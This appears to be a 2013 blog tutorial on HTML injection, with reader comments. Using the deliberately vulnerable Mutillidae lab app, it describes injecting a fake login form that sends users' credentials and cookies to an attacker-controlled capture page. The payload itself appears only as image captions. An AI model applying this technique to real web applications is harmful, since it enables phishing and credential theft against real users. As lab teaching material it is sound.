HTML Injection

26 Jun

HTML Injection is a vulnerability which occurs in web applications that allows users to insert html code via a specific parameter for example or an entry point. This type of attack can be used in combination with some sort of social engineering in order to trick valid users of the application to open malicious websites or to insert their credentials in a fake login form that it will redirect the users to a page that captures cookies and credentials. In this tutorial we are going to see how we can exploit this vulnerability effectively once it is discovered. For the needs of the article the Mutillidae will be used as the vulnerable application.

Let’s say we have a page like the following:


Vulnerable Form

Vulnerable Form


Of course in this example there is an indication that this form is accepting HTML tags as it is part of the functionality of the application. A malicious attacker will think that he can exploit the users of this application if he set up a page that is capturing their cookies and credentials in his server. If he has this page then he can trick the users to enter their credentials by injecting into the vulnerable page a fake HTML login form. Mutillidae has already a data captured page so we are going to use this page for our tutorial.

Mutillidae - Data Capture Page

Mutillidae – Data Capture Page


Now we can inject HTML code that it will cause the application to load a fake login form.

Injecting HTML Code - Fake Login

Injecting HTML Code – Fake Login


The next image is showing the fake login form:

Fake Login Form

Fake Login Form


Every user that will enter his credentials it will redirected to another page where his credentials will stored. In this case the credentials can be found at the data capture page and we can see them below:





As we saw in this article HTML injection vulnerabilities are very easy to exploit and can have large impact as any user of the web application can be a target. System admins must take appropriate measures for their web applications in order to prevent these type of attacks.


Posted by on June 26, 2013 in Web Application


Tags: ,

5 responses to “HTML Injection

  1. c

    June 26, 2013 at 5:01 pm

    Thanks for your article, a question: The data captured is stored in a file in the same server o can be transfer to another server??


  2. netbiosX

    June 26, 2013 at 10:57 pm

    The data capture page is stored on the web server that you control.

  3. GuiRaimbault

    July 20, 2013 at 6:29 am

    Hi! Thanks for your article but the use of Mutillidae (a learning plateform, done to be vulnerable as much as possible) makes this article low level. The same thing on a real website would be better.
    Nevertheless, your example is good🙂

  4. 7n47!5

    March 15, 2014 at 5:18 pm

    Nice one (y) and very nice this site


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: